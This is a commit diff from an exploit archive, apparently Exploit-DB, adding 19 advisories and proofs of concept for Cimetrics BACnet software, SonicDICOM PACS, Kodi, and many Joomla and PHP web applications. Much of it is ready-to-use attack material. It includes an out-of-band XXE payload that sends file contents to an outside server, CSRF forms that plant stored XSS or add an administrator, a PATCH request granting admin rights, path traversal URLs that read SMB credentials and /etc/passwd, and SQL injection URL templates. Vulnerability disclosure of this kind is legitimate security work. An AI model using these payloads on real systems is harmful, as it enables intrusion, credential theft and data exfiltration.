DB: 2017-02-13

19 new exploits

Cimetrics BACstac 6.2f - Privilege Escalation
Cimetrics BACnet Explorer 4.0 - XML External Entity Injection
SonicDICOM PACS 2.3.2 - Cross-Site Scripting
SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)
SonicDICOM PACS 2.3.2 - Privilege Escalation
Kodi 17.1 - Arbitrary File Disclosure
WhizBiz 1.9 - SQL Injection
TI Online Examination System 2.0 - SQL Injection
Viavi Real Estate - SQL Injection
Viavi Movie Review - 'id' Parameter SQL Injection
Viavi Product Review - 'id' Parameter SQL Injection
Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection
Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection
Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection
Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection
Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection
Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection
Joomla! Component Vik Booking 1.7 - SQL Injection
Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-02-13 05:01:18 +00:00
parent 187fb60098
commit 8b6bfd7f93
20 changed files with 622 additions and 0 deletions

View file

@ -8790,6 +8790,8 @@ id,file,description,date,author,platform,type,port
41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
41265,platforms/windows/local/41265.py,"IVPN Client 2.6.1 - Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local,0
41320,platforms/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Privilege Escalation",2017-02-12,LiquidWorm,windows,local,0
41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37228,3 +37230,20 @@ id,file,description,date,author,platform,type,port
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41308,platforms/php/webapps/41308.txt,"WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,54 @@
# Exploit Title: Kodi - Local File Inclusion
# Date: 12 February 2017
# Exploit Author: Eric Flokstra
# Vendor Homepage: https://kodi.tv/
# Software Link: https://kodi.tv/download/
# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
# Tested on: Linux
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation. Chorus is a web interface
for controlling and interacting with Kodi. It is hosted by the Kodi
installation.
The web interface loads a thumbnail of an image, video or add-on when
selecting a category in the left menu with the following request:
http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
Insufficient validation of user input is performed on this URL resulting
in a local file inclusion vulnerability. This enables attackers
to retrieve arbitrary files from the filesystem by changing the location
after the '/image/image%3A%2F%2F part.
<--Examples-->
1) If Kodi is connected to a NAS the following request can be used to obtain plain text SMB credentials:
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
Response:
<passwords><path><from pathversion="1">smb://192.168.1.15/</from><to
pathversion="1">smb://username:password@192.168.1.15//share</to></path></passwords>
2) Request to retrieve the content of /etc/passwd:
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...

17
platforms/php/webapps/41313.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: WhizBiz - Business Directory CMS v1.9 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://webhelios.com/
# Software Buy: https://codecanyon.net/item/whizbiz-business-directory-cms/12931569
# Demo: http://whizbiz.webhelios.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/en/results/plainkey=[SQL]
# # # # #

22
platforms/php/webapps/41314.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: TI Online Examination System v2.0 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://textusintentio.com/
# Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Demo: http://oesv2.textusintentio.com/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as student user
# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
# http://localhost/[PATH]/center/student_edit.php?s_id=[SQL]
# http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL]
# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
# Etc..
# # # # #

19
platforms/php/webapps/41315.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Viavi Real Estate - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://viavilab.com/
# Software Buy: https://codecanyon.net/item/viavi-real-estate/11217313
# Demo: http://viavilab.com/codecanyon/real_estate_demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/property-detail.php?pid=[SQL]
# http://localhost/[PATH]/buysalerent.php?sort=[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41316.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Viavi Movie Review - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://viavilab.com/
# Software Buy: https://codecanyon.net/item/movie-review/12729570
# Demo: http://viavilab.com/codecanyon/movie_review_demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/genres.php?id=[SQL]
# Etc..
# # # # #

18
platforms/php/webapps/41317.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Viavi Product Review - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://viavilab.com/
# Software Buy: https://codecanyon.net/item/product-review/12406163
# Demo: http://viavilab.com/codecanyon/product_review_demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/category.php?id=[SQL]
# Etc..
# # # # #

19
platforms/php/webapps/41318.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Quadz School Management System v3.1 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://awardcorporation.com/
# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
# Demo: http://mass.awardcorporation.com/
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as student user
# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
# # # # #

19
platforms/php/webapps/41319.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Domains & Hostings Manager PRO v 3.0 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://endavi.com/
# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
# Demo: http://endavi.com/dhrpro_demo/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/list.php?entries=[SQL]
# http://localhost/[PATH]/edit.php?entries=[SQL]
# # # # #

16
platforms/php/webapps/41322.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: Joomla Component onisPetitions 2.5 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onispetitions/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# POC :
# tag Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_onispetitions&view=petitions&tag=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

16
platforms/php/webapps/41323.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: Joomla Component onisQuotes 2.5 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/news-display/quotes/onisquotes/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# POC :
# tag Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_onisquotes&view=quotes&tag=[SQL]&Itemid=180
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

17
platforms/php/webapps/41324.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component onisMusic 2 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/onismusic/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:option=com_onismusic
# Tested on: Linux
# POC :
# tag Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_onismusic&view=songs&tag=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

17
platforms/php/webapps/41325.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component Sponsor Wall 7.0 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?oprion=com_sponsorwall
# Tested on: Linux
# POC :
# wallid Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

17
platforms/php/webapps/41326.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component Vik Booking 1.7 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extension/vik-booking/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_vikbooking
# Tested on: Linux
# POC :
# room_ids[0] Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_vikbooking&view=availability&room_ids[0]=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

17
platforms/php/webapps/41327.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component Soccer Bet 4.1.5 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_soccerbet
# Tested on: Linux
# POC :
# Cat Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_soccerbet&view=matches&cat=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

101
platforms/windows/local/41320.txt Executable file
View file

@ -0,0 +1,101 @@
Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 6.2f
Summary: BACstac belongs to product BACstac(TM) Networking Software and
was developed by company Cimetrics Inc. Cimetrics is excited to announce
a new version of our industry-leading BACnet protocol stack: BACstac 6.8.
The Cimetrics BACstac saves man-years of development when your company needs
to create a BACnet solution ! Our software team has created a set of BACnet
libraries which greatly simplify the task of interfacing to BACnet.
Even the largest companies in the HVAC industry use our code because it is
a very complex and time consuming task keeping up with the ongoing changes
that are taking place in the BACnet committees. For example, many hundreds
of protocol modifications, requirements, and enhancements have taken place
in just the past year. By purchasing the Cimetrics BACstac solution, we do
the compatibility coding and testing. This typically saves man-years of
software developer time EVERY YEAR !
Desc: The application suffers from an unquoted search path issue impacting
the service 'bacstac' (bacstac-gtw.exe) for Windows deployed as part of BACstac
routing service solution. This could potentially allow an authorized but non-privileged
local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local users code would execute with the elevated privileges
of the application.
BACstac also provides a named pipe used for IPC connection between a BACstac
application and the BACstac service.
The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
IPC mechanism was chosen to allow portability to embedded systems, and it uses a
fixed number of slots. The slots are recycled when an application stops running.
With Object-based multiplexing, Service requests that identify a particular Object
(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
the BACstac API.
A number of BACstac protocol stack run-time configuration parameters are stored
in the Windows Registry. These values are created and initialized when the protocol
stack is installed. The registry entries are not completely removed when the protocol
stack is uninstalled (this is standard behaviour for .INF files). The Registry
entries are located in:
HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
The vulnerability exist due to the improper permissions, with the 'F' flag (Full)
for 'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5397
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
13.12.2016
--
C:\>sc qc bacstac
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bacstac
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BACstac Protocol
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
C:\>accesschk.exe \pipe\bacstac
Accesschk v6.02 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\bacstac
RW Everyone
C:\>

View file

@ -0,0 +1,55 @@
Cimetrics BACnet Explorer 4.0 XXE Vulnerability
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 4.0.0.0
Summary: The BACnet Explorer is a BACnet client application that
helps auto discover BACnet devices.
Desc: BACnetExplorer suffers from an XML External Entity (XXE)
vulnerability using the DTD parameter entities technique resulting
in disclosure and retrieval of arbitrary data on the affected node
via out-of-band (OOB) attack. The vulnerability is triggered when
input passed to the xml parser is not sanitized while parsing the
xml project file.
Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
BACstac Library: 1.5.6116.0
BACstac Service: 6.8.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5398
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php
30.01.2017
--
Open file evil.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
%remote;
%root;
%oob;]>
xxe.xml on the web server:
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
pyhon -m SimpleHTTPServer 8080
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -

View file

@ -0,0 +1,78 @@
SonicDICOM PACS 2.3.2 Multiple Stored Cross-Site Scripting Vulnerabilities
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
Desc: The application suffers from multiple stored XSS vulnerabilities.
Input passed to several API POST parameters is not properly sanitised
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Microsoft-HTTPAPI/2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5394
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5394.php
22.11.2016
--
CSRF Stored XSS via value parameter in settings API:
----------------------------------------------------
<html>
<body>
<form action="http://172.19.0.214/viewer/api/settings/add" method="POST">
<input type="hidden" name="id" value="testingus" />
<input type="hidden" name="key" value="viewer&#46;display&#46;overlay&#46;tl" />
<input type="hidden" name="value" value="&#123;"angle"&#58;&#123;"item&#95;name"&#58;"Angle"&#44;"display&#95;name"&#58;"&#92;"><script>alert&#40;1&#41;<&#47;script>"&#125;&#125;" />
<input type="submit" value="Request #1" />
</form>
</body>
</html>
CSRF Stored XSS via Name parameter in sendsettings API:
-------------------------------------------------------
<html>
<body>
<form action="http://172.19.0.214/viewer/api/sendsettings/create" method="POST">
<input type="hidden" name="Name" value=""><script>prompt&#40;2&#41;<&#47;script>" />
<input type="hidden" name="IPAddress" value="1&#46;1&#46;1&#46;1" />
<input type="hidden" name="Port" value="123" />
<input type="hidden" name="CalledAETitle" value="asd" />
<input type="hidden" name="CallingAETitle" value="dsa" />
<input type="submit" value="Request #2" />
</form>
</body>
</html>
CSRF Stored XSS via Name parameter in providers API:
----------------------------------------------------
<html>
<body>
<form action="http://172.19.0.214/viewer/api/providers/create" method="POST">
<input type="hidden" name="Name" value=""><script>confirm&#40;2&#41;<&#47;script>" />
<input type="hidden" name="Port" value="123" />
<input type="hidden" name="AETitle" value="ZSL" />
<input type="hidden" name="AllowAnonymousUsers" value="true" />
<input type="hidden" name="IsAnonymous" value="true" />
<input type="submit" value="Request #3" />
</form>
</body>
</html>

View file

@ -0,0 +1,41 @@
SonicDICOM PACS 2.3.2 CSRF Add Admin Exploit
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Microsoft-HTTPAPI/2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5395
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5395.php
22.11.2016
--
<html>
<body>
<form action="http://172.19.0.214/viewer/api/accounts/create" method="POST">
<input type="hidden" name="Id" value="testingus" />
<input type="hidden" name="Name" value="Second Admin" />
<input type="hidden" name="Authority" value=“1” />
<input type="hidden" name="Password" value="654321" />
<input type="submit" value="Request" />
</form>
</body>
</html>

View file

@ -0,0 +1,42 @@
SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
Desc: The application suffers from a privilege escalation vulnerability.
Normal user can elevate his/her privileges by sending a HTTP PATCH request
seting the parameter 'Authority' to integer value '1' gaining admin rights.
Tested on: Microsoft-HTTPAPI/2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5396
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php
22.11.2016
--
PATCH /viewer/api/accounts/update HTTP/1.1
Host: 172.19.0.214
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: {REMOVED_FOR_BREVITY}
Connection: close
Id=testingus&Name=peend&Authority=1